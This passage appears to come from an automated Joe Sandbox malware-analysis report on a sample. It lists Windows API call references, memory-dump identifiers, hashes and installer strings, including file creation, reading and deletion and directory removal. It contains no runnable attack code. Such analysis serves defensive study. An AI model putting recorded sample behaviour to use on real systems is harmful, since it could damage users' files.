                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
